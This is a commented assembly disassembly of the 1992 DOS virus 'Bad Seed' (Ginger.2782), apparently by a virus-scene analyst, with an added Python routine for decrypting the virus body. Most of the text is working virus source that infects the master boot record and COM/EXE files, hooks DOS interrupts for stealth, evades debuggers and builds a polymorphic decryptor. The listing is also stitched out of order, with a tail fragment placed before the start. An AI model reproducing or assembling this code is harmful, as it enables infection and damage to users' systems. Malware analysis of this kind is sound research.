
ADD BX, 64 ; Offset decryptor + fixed


; size of decryptor.

MOV [SI], BX ; (end of decryptor).


INC SI
INC SI

POP BX ; Start of code.

MOV BYTE PTR [SI], 72h ; JB xx


INC SI

MOV DX, SI ; DX = displacement patch


; offset.
INC SI

CALL Add_Junk

MOV [SI], CL ; MOV BX/SI, xxxx


INC SI

MOV [SI], BX ; Start decryptor.


INC SI
INC SI

MOV AX, SI ; Calculate displacement


SUB AX, DX ; between DX and SI.
DEC AX

MOV BX, DX ; JB displacement offset.


MOV [BX], AL ; Patch it.

CALL Add_Junk
CALL Add_Junk

MOV BYTE PTR [SI], 0E2h ; LOOP xx


INC SI

SUB DI, SI ; Displacement between here


DEC DI ; and start decrypt loop.

MOV AX, DI

MOV [SI], AL ; Store displacement.


INC SI

CALL Add_Junk

RETN

Add_Junk:
DEC BP

TEST BYTE PTR ES:[BP], 00001111b


JZ Exit_Add_Junk

DEC BP
MOV AL, ES:[BP]
TEST AL, 00000010b
JZ Junk_CMP

TEST AL, 00000100b


JZ Junk_TEST

TEST AL, 00001000b


JZ Junk_NOP

MOV [SI], 0C789h ; MOV DI, AX


INC SI
INC SI

JMP Exit_Add_Junk

Junk_NOP: MOV BYTE PTR [SI], 90h ; NOP


INC SI

JMP Exit_Add_Junk

Junk_TEST: MOV AL, 85h ; TEST r16

Make_Operand: DEC BP
MOV AH, ES:[BP]

TEST AH, 00000010b


JZ Set_reg_reg

DEC AL ; r16 -> r8.

Set_reg_reg: OR AH, 11000000b ; reg/reg operation.

MOV [SI], AX ; Store junk instruction.


INC SI
INC SI

JMP Exit_Add_Junk

Junk_CMP: DEC BP

TEST BYTE PTR ES:[BP], 00000010b


JZ Junk_CLD

MOV AL, 39h ; CMP r16, r16


JMP Make_Operand

Junk_CLD: MOV BYTE PTR [SI], 0FCh ; CLD


INC SI

Exit_Add_Junk: RETN

Append_Body_Encrypted:

CALL Crypt_Virus

MOV AH, 40h


MOV BX, File_Handle
MOV DX, 0
MOV CX, Virus_Size

PUSHF
CALL DWORD PTR Old_Int21h
JC Crypt_Loop

SUB AX, CX

Crypt_Loop: PUSHF

CMP byte ptr ds:Append_Body_Encrypted_Copy+(Encryptor-Append_Body_Encrypted), 28h ; SUB
JNE Do_Crypt_Virus

MOV byte ptr ds:Append_Body_Encrypted_Copy+(Encryptor-Append_Body_Encrypted), 0
Do_Crypt_Virus: CALL Crypt_Virus

POPF

RETN

Crypt_Virus:
MOV BX, 0
MOV SI, OFFSET Decryptor
MOV CX, OFFSET Decryptor

Crypt_Byte: MOV DL, [SI] ; Get key from the decryptor.

XOR [BX], DL ; Encrypt/decrypt byte.


Encryptor = BYTE PTR $-2

INC SI
INC BX

CMP SI, OFFSET Old_Int13h


JB Loop_Crypt_B

MOV SI, OFFSET Decryptor

Loop_Crypt_B: LOOP Crypt_Byte

RETN

Decryptor:
PUSH CS

TEST CL, BL

POP DS ; Load DS with CS.

MOV BX, 0

TEST SP, AX

MOV SI, OFFSET Decryptor ; Decryptor pointer.

CLD

TEST CH, BL

MOV CX, OFFSET Decryptor ; Count to decrypt.

TEST AX, CX
Decrypt_Byte: MOV DL, [SI] ; Get the key from the
; decryptor.

DB 039h, 0D8h

; * CMP AX, BX *

XOR [BX], DL ; Decrypt byte.

INC SI ; Update code & decryptor


INC BX ; pointers.

NOP

CMP SI, OFFSET Old_Int13h ; Completely ran over the


JB Decrypt_Loop ; decryptor?

NOP

MOV SI, OFFSET Decryptor ; Then reload the pointer.

Decrypt_Loop: NOP

LOOP Decrypt_Byte ; Decrypt all bytes.

CLD

JMP Init_Virus ; Jump to the real start.

ORG Decryptor+64 ; Pad decryptor size.

Old_Int13h DW 0, 0

End_Body:

Buffer:

File_Handle DW 0
Old_SP DW 0
Old_SS DW 0
Old_Attr DW 0
Old_File_Date DW 0
Old_File_Time DW 0
Old_Int1Ch DW 0, 0
Old_Int21h DW 0, 0
Old_Int24h DW 0, 0
Int_Count DW 0

New_Int13h_Copy:

DB (New_Int1Ch-New_Int13h) DUP(0)

Append_Body_Encrypted_Copy:

DB (Decryptor-Append_Body_Encrypted) DUP(0)

Header DW 14 DUP(0)

Validate_Header DW 4 DUP(0)

ORG Buffer+512
End_Heap:
Carrier:
MOV AX, 4C00h
INT 21h

EXE_Header STRUC
EXE_ID DW 0
Image_Mod_512 DW 0
File_512_Pages DW 0
Reloc_Items DW 0
Header_Size DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS

Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0)
FCB_Ext DB 3 DUP(0)
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0
Find_FN_FCB ENDS

Find_FN_Dir STRUC
Dir_Reserved DB 21 DUP(0)
Dir_Attr DB 0
Dir_Time DW 0
Dir_Date DW 0
Dir_Size DW 0, 0
Dir_Name DB 13 DUP(0)
Find_FN_Dir ENDS

END Init_Virus
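The Crypt_Virus / Decryptor loop above keys every body byte on the decryptor's own bytes and wraps the key pointer when it runs past the 64-byte padded decryptor (OFFSET Old_Int13h). The following is an added example, not code from the listing or its author: a Python model of that loop that an analyst can use to recover the plain body from a dumped image. The ADD/SUB variants follow the Encryptor opcode patch (28h to 00h) shown in Append_Body_Encrypted and are an assumption about how such a pair is undone; all sample bytes are constructed.

```python
# Added example, not from the listing or its author: a Python model of the
# Crypt_Virus / Decryptor loop.  The virus keys each body byte on the
# decryptor's own bytes, so an analyst who has the 64-byte decryptor can
# recover the plain body without emulating the code.

DECRYPTOR_SIZE = 64          # "ORG Decryptor+64" pads the decryptor to 64 bytes

# Opcode of the "[BX], DL" instruction selected by the Encryptor byte:
# 30h = XOR, 28h = SUB (the value Append_Body_Encrypted tests for), 00h = ADD
# (the value it patches in before the second pass).  Assumption: an ADD/SUB
# encryptor is paired with the opposite operation on the decrypt pass.
OPCODE_TO_OP = {0x30: "xor", 0x28: "sub", 0x00: "add"}
INVERSE_OP = {"xor": "xor", "sub": "add", "add": "sub"}


def _apply(op, data_byte, key_byte):
    """One "<op> [BX], DL" step on a single byte."""
    if op == "xor":
        return data_byte ^ key_byte
    if op == "add":
        return (data_byte + key_byte) & 0xFF
    if op == "sub":
        return (data_byte - key_byte) & 0xFF
    raise ValueError("unknown operation: %r" % (op,))


def crypt_body(image, decryptor_offset, op="xor"):
    """Run one pass of the loop over a full virus image.

    image            -- body followed by the padded decryptor (and whatever
                        follows it, such as the Old_Int13h words)
    decryptor_offset -- OFFSET Decryptor: both the iteration count (CX) and
                        the start of the key stream (SI)
    op               -- what the loop does to [BX] with DL

    Only bytes 0 .. decryptor_offset-1 change; the decryptor itself is never
    touched, which is what keeps the key stream stable across the pass.
    """
    key = image[decryptor_offset:decryptor_offset + DECRYPTOR_SIZE]
    if len(key) != DECRYPTOR_SIZE:
        raise ValueError("image too short for a 64-byte decryptor")
    out = bytearray(image)
    si = 0                                 # SI - OFFSET Decryptor
    for bx in range(decryptor_offset):     # LOOP Crypt_Byte, CX = decryptor_offset
        out[bx] = _apply(op, out[bx], key[si])
        si += 1
        if si == DECRYPTOR_SIZE:           # CMP SI, OFFSET Old_Int13h -> reload
            si = 0
    return bytes(out)


def decrypt_body(image, decryptor_offset, encryptor_opcode=0x30):
    """Undo a pass made with the given Encryptor opcode: XOR is its own
    inverse, SUB is undone with ADD (the 28h -> 00h patch in the listing),
    ADD with SUB."""
    return crypt_body(image, decryptor_offset,
                      INVERSE_OP[OPCODE_TO_OP[encryptor_opcode]])


def build_sample_image(body, decryptor):
    """Constructed test image: body, decryptor padded to 64 bytes, then the
    two words of Old_Int13h that follow the decryptor in the listing."""
    if len(decryptor) > DECRYPTOR_SIZE:
        raise ValueError("decryptor longer than 64 bytes")
    padded = decryptor + bytes(DECRYPTOR_SIZE - len(decryptor))
    return bytes(body) + padded + bytes(4)


if __name__ == "__main__":
    # Constructed sample: a 200-byte body and a decryptor that starts with the
    # opcodes the listing shows (PUSH CS, POP DS, CMP AX,BX, NOP, CLD).
    body = bytes(range(200))
    decryptor = bytes([0x0E, 0x1F, 0x39, 0xD8, 0x90, 0xFC]) + bytes(range(58))
    image = build_sample_image(body, decryptor)
    encrypted = crypt_body(image, 200, "sub")          # a pass with a SUB encryptor
    recovered = decrypt_body(encrypted, 200, 0x28)     # undone with ADD
    print("round trip ok:", recovered == image)
```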
; Bad Seed (Ginger.2782) disasm.
; Multipartite full-stealth MBS/COM/EXE.
; Quite a good virus for its time (1992), yet the coding style could be
; made more compact, and it's buggy as well.
; Bugs marked with '***'.
; T-2000/IR, February 2000 - September 2000.

.MODEL TINY
.CODE

Virus_Size EQU (End_Body-START)
Virus_Size_512 EQU ((End_Body-START)+511)/512
Virus_Size_1024 EQU 3
COM EQU 1
EXE EQU 0
Boot EQU 0
File EQU 1

START:
CALL File_Entry

Boot_Loader: ; *** This code assumes DS = 0, which
; does not necessarily have to be the case.

; Restore original word that was temporarily
; replaced with the 55AAh bootmarker.

MOV WORD PTR DS:[7C00h+510], 0
Original_Word = WORD PTR $-2

; Steal 3k of DOS memory to hide the virus in.

SUB WORD PTR DS:[413h], Virus_Size_1024

INT 12h ; Get new DOS memory size.

MOV CL, 6 ; Calculate segment where to
SHL AX, CL ; hide.

MOV ES, AX ; ES = virus segment.

; Read rest of virusbody off disk.

MOV AX, 0200h+(Virus_Size_512-1)
MOV BX, 512+3
MOV CX, 3
INT 13h

MOV AL, 0E8h ; CALL xxxx opcode.
XOR DI, DI ; A call to the entrypoint
CLD ; for file infections.
STOSB

MOV AX, (File_Entry-Boot_Loader)
STOSW

MOV CX, (512/2) ; Copy virus bootsector
MOV SI, 7C00h ; too, to the virus segment.
REP MOVSW

; Initialize some variables.

MOV ES:Ofs_Old_Int13h, OFFSET Old_Int13h
MOV ES:Ofs_Real_Int13h, OFFSET Real_Int13h
MOV ES:Origin, Boot
MOV ES:File_Handle, 0

MOV SI, OFFSET Hook_Ints

PUSH ES ; Relocated virus code.
PUSH SI

MOV AX, OFFSET Boot_Int21h
MOV SI, OFFSET Boot_Loader
MOV DI, OFFSET Old_Int08h
NOP

RETF ; Jump to relocated code.

EXE_Data:

EXE_SP DW 0
EXE_SS DW 0
EXE_IP DW 0
EXE_CS DW 0

DB 'You can''t catch the Gingerbread Man!!'

File_Entry:
XCHG BP, AX ; Save AX (FCB-status) in BP.

POP SI ; POP delta offset.

PUSH ES ; Save ES & DS (PSP).
PUSH DS

PUSH CS
POP DS

MOV AX, 0EEE7h ; See if virus is already
INT 21h ; TSR.

CMP AX, 0D703h ; It is?
JE JMP_Run_Host ; Then bail to host.

MOV ES, ES:[2Ch] ; Environment block.

CLD
XOR DI, DI

Find_ComSpec: PUSH SI

; Scan for COMSPEC= to find the command interpreter.

ADD SI, (ComSpec_String-Boot_Loader)
MOV CX, 8
REPE CMPSB

PUSHF

CALL Get_End_DI ; Go to the next setting.

POPF
JE Save_ComSpec ; Yeah got it..
POP SI

JNE Find_ComSpec ; Repeat the search.

JMP_Run_Host: JMP Run_Host

DB 'Bad Seed - Made in OZ'

Save_ComSpec: PUSH DS ; Swap DS & ES.
PUSH ES
POP DS
POP ES

XCHG SI, DI ; SI = end of path to command
; interpreter.

STD ; SI = last byte of path to
LODSW ; command interpreter.

MOV CX, SI ; Remember end offset.
DEC CX ; Exclude the '\'.

ADD DI, 12 ; DI = end of ComSpec_Value.
; *** Buffer is 1 byte too
; small, now filenames with
; 8 characters will fuck up.
Copy_ComSpec: LODSB
STOSB

CMP AL, '\' ; Copied entire filename?
JNE Copy_ComSpec ; Otherwise just go on.

SUB CX, SI ; Get the size of the command
; interpreter filename.
POP SI

PUSH CS
POP DS

; Keep it for later use.

MOV [SI+(ComSpec_Length-Boot_Loader)], CL

MOV BYTE PTR [SI+(Origin-Boot_Loader)], File

XOR AX, AX ; ES = IVT.
MOV ES, AX

PUSH SI

; Copy the stealth code to an unused piece
; of memory (only used during bootup).

ADD SI, (File_Int21h-Boot_Loader)
MOV DI, 600h
MOV CX, (End_Body-File_Int21h)
CLD
REP MOVSB

POP SI

MOV DS, CX ; DS = IVT.

; Patch appropriate offsets.

MOV DS:600h+(Ofs_Old_Int13h-File_Int21h), 600h+(Old_Int13h-File_Int21h)
MOV DS:600h+(Ofs_Real_Int13h-File_Int21h), 600h+(Real_Int13h-File_Int21h)

MOV AX, 600h ; INT 21h ISR to hook up.

Hook_Ints: CLI

; Starting from a bootsector or file?

CMP BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot
JNE Hook_Int21h

MOV AX, OFFSET New_Int08h ; Hook INT 08h.
XCHG DS:[(08h*4)], AX
STOSW

MOV AX, CS
XCHG DS:[(08h*4)+2], AX
STOSW

MOV DS:[(21h*4)+2], 0FFFFh ; Initialize DOS segment to
; a dummy value so the virus
; can determine when DOS has
; been loaded.
STI

ADD DI, (Old_Int13h-(Old_Int08h+4))
JMP SHORT Init_Tunnel_13

Hook_Int21h: XCHG DS:[(21h*4)], AX ; Hook INT 21h.
STOSW

XCHG BX, AX ; Save original INT 21h.

MOV AX, ES
XCHG DS:[(21h*4)+2], AX
STOSW

XCHG BX, AX ; Store original INT 21h
STOSW ; another time.

XCHG BX, AX
STOSW

; Hook INT 01h for recursive tunneling.

LEA AX, CS:[SI+(New_Int01h-Boot_Loader)]
XCHG DS:[(01h*4)], AX
STOSW

MOV AX, CS
XCHG DS:[(01h*4)+2], AX
STOSW

STI

Init_Tunnel_13: CLC ; Save INT 13h, then tunnel
; INT 13h.
PUSH ES

Save_Int13h: PUSH DS
LDS BX, DS:[(13h*4)] ; Get (tunneled) INT 13h.

MOV AX, BX ; Save (tunneled) INT 13h.
STOSW

MOV AX, DS
STOSW

JC Pick_i13h_ISR ; Already tunneled INT 13h ?

PUSH DS ; ES:BX = INT 13h.
POP ES

PUSHF ; Recursively tunnel INT 13h
PUSH CS ; if origin is file, else
CALL Tunnel_Int13h ; just save INT 13h.

POP DS
POP ES

STC ; Set flag to only save
JC Save_Int13h ; INT 13h.

Pick_i13h_ISR: POP DS

PUSH SI

CMP BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot

PUSHF

; Stealth ISR.

MOV SI, 600h+(Boot_Int13h-File_Int21h)

JNE Hook_Int13h

; Stealth/infection ISR.

MOV SI, OFFSET Boot_Int13h

Hook_Int13h: CLI ; Hook the virus up.
MOV DS:[(13h*4)], SI
MOV DS:[(13h*4)+2], ES
STI

POPF

POP SI

PUSH CS
POP DS

JE Run_Old_Boot ; Pass control to real BS.

; If running from a file then go infect the MBS.

PUSH ES

PUSH CS
POP ES
MOV AX, 0201h ; Read the MBS of HDD 1.
LEA BX, CS:[SI+(Buffer-Boot_Loader)]
MOV CX, 1
MOV DX, 80h
INT 03h

POP ES

JNC Scan_Part_Tbl ; Go on if no error.

JMP SHORT Swap_Boot_ID ; Error, bail.

Scan_Part_Tbl: MOV CX, 4 ; Maximum of 4 partitions.
MOV DI, 1BEh ; Start of partition info.

Find_Act_Part: TEST BYTE PTR [BX+DI], 80h ; It's the active partition?
JNZ Chk_Partition

ADD DI, 16 ; Next partition.

LOOP Find_Act_Part ; Check all partitions.

Run_Host: POP DS ; Restore PSP.
MOV DX, DS ; Save PSP in DX.

POP ES

; This host is of EXE-type?

CMP CS:[SI+(Host_Header-Boot_Loader)], 'ZM'
JE Restore_EXE

; Restore .COM-file in memory and execute it.

ADD SI, (Host_Header-Boot_Loader)
MOV DI, 100h

PUSH CS ; Push entrypoint of host
PUSH DI ; *** CS mod ain't needed.

MOVSB ; Restore first 3 bytes of
MOVSW ; the host.

XOR AX, AX ; Clear registers.
XOR BX, BX
XOR CX, CX
XOR DX, DX
XOR SI, SI
XOR DI, DI

XCHG BP, AX ; Restore FCB status in AX.

RETF ; Jump to the host.

Run_Old_Boot:
XOR CX, CX ; Zero ES.
MOV ES, CX

MOV AX, 0201h ; Read the standard MS-DOS
MOV BX, 7C00h ; bootsector.
MOV CX, 1
MOV DX, 0180h
INT 13h

PUSH ES ; And go execute it.
PUSH BX
RETF

Restore_EXE: ADD DX, (100h/16) ; Get effective segment.

; Update old CS & SS with it.

ADD CS:[SI+(EXE_CS-Boot_Loader)], DX
ADD DX, CS:[SI+(EXE_SS-Boot_Loader)]

; Restore host's original stack.

MOV SS, DX
MOV SP, CS:[SI+(EXE_SP-Boot_Loader)]

XCHG BP, AX ; Restore AX (FCB status).

; Jump to the host's original entrypoint.

JMP DWORD PTR CS:[SI+(EXE_IP-Boot_Loader)]

Chk_Partition: INC DI ; Start of partition.

MOV ES:[600h+(Act_Partition-File_Int21h)], DI
MOV DS:[SI+(Act_Partition-Boot_Loader)], DI

MOV AX, 0200h ; Head 0, sector 2 (where
; the virusbody is located).

CMP DS:[BX+DI], AX ; MBS is already infected?
JE Run_Host ; Then just bail out.

MOV DS:[BX+DI], AX ; Point partition's boot-
; sector to virusbody.
PUSH CS
POP DS

CLC ; No errors so far..

Swap_Boot_ID: MOV AX, 0AA55h ; Bootsector ID.

XCHG DS:[SI+510], AX ; Swap-in bootsector ID.

PUSH AX ; Save original word.
JC Chk_If_Unhook ; Error occurred?

; Save original word in virusbody.

MOV [SI+(Original_Word-Boot_Loader)], AX

PUSH CS
POP ES

MOV AX, 0301h ; Write patched MBS back
MOV CX, 1 ; to disk.
MOV DX, 80h
INT 03h
JC Chk_If_Unhook
; Write the virusbody to the zero-track.

MOV AX, 0300h + (Virus_Size_512)
MOV BX, SI
MOV CX, 2
INT 03h

Chk_If_Unhook: MOV AX, 0 ; Zero DS & ES (without
MOV ES, AX ; changing any flags).
MOV DS, AX

PUSH SI

CLD
CLI

JNC Restore_Int03h ; Harddisk was successfully
; infected? If not, unhook
; the INT 13h stealth.

MOV SI, 600h+(Old_Int13h-File_Int21h)
MOV DI, (13h*4)
MOVSW
MOVSW

Restore_Int03h: POP SI
PUSH SI

PUSH CS
POP DS

; Restore INT 03h.

ADD SI, (Old_Int03h-Boot_Loader)
MOV DI, (03h*4)
MOVSW
MOVSW

STI

POP SI

POP DS:[SI+510] ; Restore original word.

JMP Run_Host

; Called with ES:BX as vector address of INT 13h.
Tunnel_Int13h:
PUSHF

; Not necessary to tunnel from boot.

CMP BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot
JE Push_CS_IP

POPF

MOV AX, 300h ; Flags, TF & IF enabled.
PUSH AX

Push_CS_IP: PUSH ES ; Untunneled INT 13h.
PUSH BX
MOV AH, 01h ; Get status byte.
MOV DL, 80h ; 1st HDD.

New_Int01h: CLI

PUSH BP ; Setup a stack pointer.
MOV BP, SP

PUSH BX ; Save scrap registers.
PUSH AX

MOV BX, CS ; *** Not used.

MOV AX, [BP+(2*2)] ; Get segment of next
; instruction.

CMP AX, 70h ; In the DOS kernel?
JA Exit_Int01h ; If not then get out.

PUSH DS
PUSH ES

XOR BX, BX ; DS = IVT.
MOV DS, BX

MOV DS:[(13h*4)+2], AX ; Set tunneled address in
; IVT.

MOV BX, [BP+(1*2)] ; And the IP..
MOV DS:[(13h*4)], BX

PUSH DI

CALL Get_Delta_1

Old_Int03h DW 0, 0

Get_Delta_1: POP DI ; POP delta offset.

PUSH CS
POP ES

CLD

XCHG BX, AX ; Revector the tunneled
XCHG DS:[(03h*4)], AX ; INT 13h to INT 03h.
STOSW

XCHG BX, AX
XCHG DS:[(03h*4)+2], AX
STOSW

PUSH DS ; ES = IVT.
POP ES

PUSH SI

; Unhook INT 01h.

MOV SI, 600h+(Old_Int01h-File_Int21h)
MOV DI, (01h*4)
MOVSW
MOVSW

POP SI

POP DI
POP ES
POP DS

Exit_Int01h: POP AX ; Restore registers.
POP BX
POP BP

STI ; *** Useless instruction.

IRET

ComSpec_String DB 'COMSPEC='
ComSpec_Value DB 13 DUP (0)
ComSpec_Length DW 0

New_Int08h:
PUSH DS
PUSH AX

XOR AX, AX ; DS = IVT.
MOV DS, AX

CMP DS:[(21h*4)+2], 1000h ; DOS hasn't grabbed INT 21h
JA Exit_Int08h ; yet? Then wait some more..

PUSH ES
PUSH SI
PUSH DI

PUSH CS
POP ES

MOV AX, CS
MOV DI, OFFSET Old_Int21h+2
NOP

STD ; Hook INT 21h.
CLI
XCHG AX, DS:[(21h*4)+2]
STOSW

MOV AX, OFFSET Boot_Int21h
XCHG AX, DS:[(21h*4)]
STOSW

PUSH DS ; Swap DS & ES.
PUSH ES
POP DS
POP ES

MOV SI, DI ; Unhook INT 08h.
MOV DI, (08h*4)+2
MOVSW
MOVSW

STI
POP DI
POP SI
POP ES

Exit_Int08h: POP AX
POP DS

JMP DWORD PTR CS:Old_Int08h

Boot_Int21h:
PUSH DS
PUSH AX

XOR AX, AX ; DS = IVT.
MOV DS, AX

MOV AX, DS:[(01h*4)] ; Offset of INT 01h's ISR.

CMP AX, DS:[(03h*4)] ; Same as INT 03h's ?
JNE Lock_Keyboard

MOV AX, DS:[(01h*4)+2] ; Segment of INT 01h's ISR.

CMP AX, DS:[(03h*4)+2] ; Same as INT 03h's ?
JE Exit_No_Debug ; If INT 01h != INT 03h then
; a debugger is active.

Lock_Keyboard: MOV AL, 10000010b ; Disable keyboard & printer.
OUT 21h, AL

Exit_No_Debug: POP AX
POP DS

Test_11h_12h: CMP AH, 11h ; Findfirst (FCB) ?
JE Do_FCB_Stealth

CMP AH, 12h ; Findnext (FCB) ?
JNE Check_4_Create

; This is the routine Rock Steady/NuKE used in his
; FCB stealth tut, with one or two bytes changed.
; The rest of the code also shows a certain influence
; of the Rock Steady tuts.

Do_FCB_Stealth: CALL Do_Old_Int21h ; Do the filefind.

TEST AL, AL ; Error?
JNZ IRET_FCB_St

PUSH ES
PUSH AX
PUSH BX

MOV AH, 51h ; Obtain current PSP.
CALL Do_Old_Int21h

MOV ES, BX

CMP BX, ES:[16h] ; Owner PSP == PSP ? (i.e. is
JNE Exit_FCB_St ; command interpreter?).
MOV BX, DX
MOV AL, [BX] ; Get first byte of FCB.

PUSH AX

MOV AH, 2Fh ; Obtain current DTA.
CALL Do_Old_Int21h

POP AX

INC AL ; It's an extended FCB ?
JNZ Test_Seconds

ADD BX, 7 ; Then skip extended stuff.

Test_Seconds: MOV AX, ES:[BX.FCB_Time] ; Grab time word.

AND AX, 0000000000011111b ; Mask out seconds value.

XOR AL, (60/2) ; 60 seconds? (infected?).
JNZ Exit_FCB_St

; Set the seconds value in the DTA to 2.

AND BYTE PTR ES:[BX.FCB_Time], 11100000b
OR BYTE PTR ES:[BX.FCB_Time], (2/2)

; Subtract the virussize from the filesize.

SUB ES:[BX.FCB_Size], Virus_Size
SBB ES:[BX.FCB_Size+2], AX

Exit_FCB_St: POP BX
POP AX
POP ES

IRET_FCB_St: IRET

Check_4_Create: CMP AH, 3Ch ; Create/truncate file?
JE Set_RW_BX ; Then save its handle
; so it can be infected
; on close.

CMP AH, 3Dh ; Open file?
JE Set_RW_AL ; Go infect it.

CMP AH, 3Eh ; Close file?
JNE Check_4_Read

JMP Infect_3E ; Infect it if it was
; a newly created file.

Check_4_Read: CMP AH, 3Fh ; Read file?
JE J_Go_Chk_Secs ; Stealth the read.

CMP AH, 40h ; Write file?
JE J_Go_Chk_Secs ; Disinfect the file.

CMP AH, 42h ; Seek file?
JNE Check_4_Exec

CMP AL, 02h ; Seek EOF relative?
JB J1_J_Old_i21h
J_Go_Chk_Secs: JMP Go_Check_Secs ; Stealth stuff.

Check_4_Exec: CMP AH, 4Bh ; Execute/load file?
JNE Check_4_Exit

CMP AL, 02h ; It's either 4B00h or 4B01h?
JB CALL_Do_Infect ; Else don't infect.

JMP SHORT J1_J_Old_i21h

Set_RW_AL: CMP CS:Windows_Active, 1 ; Is Windoze running? Then
JE J1_J_Old_i21h ; don't do anything.

CMP AX, 3D01h ; Open file, write-only?
JNE CALL_Do_Infect

INC AL ; Then change access mode to
; read/write so the virus
; can read from it when it
; wants to disinfect it.

CALL_Do_Infect: CALL Do_Infect ; Infect it.

J1_J_Old_i21h: JMP JMP_Old_Int21h

Check_4_Exit: CMP AH, 4Ch ; Program terminate?
JNE Check_4_Date_T

JMP Check_Win_Exit ; Go check if it's Windoze.

Check_4_Date_T: CMP AH, 57h ; Get/set file date & time?
JNE Chk_4_Create_N

JMP Stealth_Seconds ; Don't let em fuck with the
; seconds.

Chk_4_Create_N: CMP AH, 5Bh ; Create new file?
JE Set_RW_BX ; Save its handle for later.

CMP AX, 6C00h ; Extended open/create?
JNE Chk_4_Res_Chk

Set_RW_BX: CMP CS:Windows_Active, 1 ; Is Windoze up and running?
JE J1_J_Old_i21h ; Then abort any infection.

PUSH BX
PUSH DX

CMP AX, 6C00h ; Don't infect on create.
JNE Save_Handle

OR BL, 00000010b ; Change access mode to
AND BL, 11111110b ; read/write.

MOV DX, SI ; DX = offset filepath.
CALL Do_Infect

Save_Handle: PUSH BX
PUSH ES
PUSH AX
PUSH CX
PUSH SI
PUSH DI

PUSH DS
POP ES

CALL Get_End_DX ; Go to end of path.

STD
MOV SI, DI

LODSB ; SI = last word extension.
LODSW

CALL Check_Extension ; .COM/EXE extension?

MOV CS:Valid_Handle, CL ; Mark handle as invalid (0).

JNE Do_Open_Create

INC CX ; Mark handle as valid (1).
MOV CS:Valid_Handle, CL

Do_Open_Create: POP DI
POP SI
POP CX
POP AX
POP ES
POP BX
POP DX

PUSH AX

CALL Do_Old_Int21h ; Do the open/create call.
JC Clear_Inf_Hand

INC SP ; Remove the top word on
INC SP ; the stack.

XCHG BX, AX ; Save the new filehandle.

PUSH CX
PUSH DX

MOV AX, 5700h ; Get file's date & time.
CALL Do_Old_Int21h

CALL Check_60_Secs ; It's infected?

POP DX
POP CX

XCHG BX, AX

JNE Save_Inf_Hand

MOV CS:Valid_Handle, AL ; Mark handle as valid (> 0).

Save_Inf_Hand: MOV CS:File_Handle, AL ; Save this filehandle.
POP BX
JMP IRET_Flags

Clear_Inf_Hand: MOV CS:Valid_Handle, 0 ; Reset handle-valid boolean.
POP AX
POP BX
JMP JMP_Old_Int21h

Chk_4_Res_Chk: CMP AX, 0EEE7h ; It's the virus' TSR check?
JE Return_ID_1

JMP JMP_Old_Int21h

Return_ID_1: MOV AH, 0D7h ; Return ID in AX and return.

New_Int24h: MOV AL, 03h ; Fail silently.
IRET

Get_End_DX:
MOV DI, DX

Get_End_DI: XOR AL, AL ; Scan to the end of the
MOV CL, 128 ; filepath.
CLD
REPNZ SCASB

RETN

Do_Infect:
PUSH ES
PUSH BX
PUSH CX
PUSH SI
PUSH DI
PUSH DS
PUSH DX

PUSH DS
POP ES

PUSH AX

CALL Get_End_DX

DEC DI ; DI = last byte of filename.
DEC DI

PUSH CS
POP DS

MOV CX, ComSpec_Length
MOV SI, OFFSET ComSpec_String+8+12
STD

PUSH DI

Comp_ComSpec: LODSB ; Save ComSpec byte in AH.
MOV AH, AL

XCHG SI, DI

LODS BYTE PTR ES:[SI] ; Fetch byte from filename.

XCHG SI, DI

AND AX, 5F5Fh ; Convert word to uppercase.
CMP AH, AL ; Bytes match?
JNE Go_Check_Ext ; If not it's not ComSpec.

LOOP Comp_ComSpec

POP DI ; If it gets to here, the
; file is the COMSPEC, and
JMP Exit_Infect ; infection is denied.

; Returns ZF if file has COM/EXE extension.
Check_Extension:
MOV CX, 2

Get_Extension: LODS WORD PTR ES:[SI]

AND AX, 5F5Fh ; Uppercase.

XCHG BX, AX

LOOP Get_Extension

CMP AX, 'MO'
JNE Check_For_EXE

CMP BX, 'C.' AND 5F5Fh

RETN

Check_For_EXE: CMP AX, 'EX'
JNE Exit_Check_Ext

CMP BX, 'E.' AND 5F5Fh

Exit_Check_Ext: RETN

Go_Check_Ext: POP SI ; SI = last byte of filename.
DEC SI ; SI = last word of filename.

POP AX ; AX on entry.
PUSH AX

CMP AX, 4B00h ; Program execute?
PUSHF

CALL Check_Extension ; File has COM/EXE extension?
JE Go_Chk_Win_Act

POPF
JE Find_File_Name

JMP Exit_Infect

DB 'CHKDSK', 0
Windows_Active = BYTE PTR $-1

DB 'MEM'
Mem_String = $-1

Go_Chk_Win_Act: POPF
JNE Check_Windows

Find_File_Name: INC SI ; DI = byte before dot.
MOV DI, SI

INC SI ; SI = extension dot.

MOV CX, SI ; Calculate path length.
SUB CX, DX

XCHG SI, DI

Chk_Start_Name: LODS BYTE PTR ES:[SI] ; Fetch a byte from path.

CMP AL, '\' ; Path separator? Then start
JE Get_Start_Name ; of filename is found.

LOOP Chk_Start_Name

JNE Chk_File_Name

Get_Start_Name: INC SI ; SI = start of filename.
INC SI

MOV DX, SI

Chk_File_Name: MOV CX, DI ; Calculate length of
SUB CX, DX ; filename without extension.

DEC DI ; DI = last byte of filename.
MOV SI, OFFSET Mem_String

CMP CX, 3 ; Can it be 'MEM' ?
JE Compare_Byte

LODSW ; SI = 'CHKDSK' string.
LODSW

CMP CX, 6 ; Can it be 'CHKDSK' ?
JNE Check_Windows

Compare_Byte: LODSB ; Fetch byte of filename and
MOV AH, AL ; save it in AH.

XCHG SI, DI

LODS BYTE PTR ES:[SI] ; Fetch byte of match string.

AND AX, 5F5Fh ; Convert to uppercase.

CMP AH, AL ; Bytes are the same?
JNE Check_4_Win ; If not, skip this shit.

XCHG SI, DI

LOOP Compare_Byte

; Now that either MEM or CHKDSK are about to be executed, the
; virus will temporarily hook INT 12h to stealth the total
; amount of DOS memory available, which these programs will
; display.

MOV AX, OFFSET New_Int12h
MOV DI, OFFSET Old_Int12h
NOP
MOV DS, CX ; DS = IVT.

PUSH CS
POP ES

CLD
CLI

XCHG DS:[(12h*4)], AX ; Save & hook INT 12h.
STOSW

MOV AX, CS
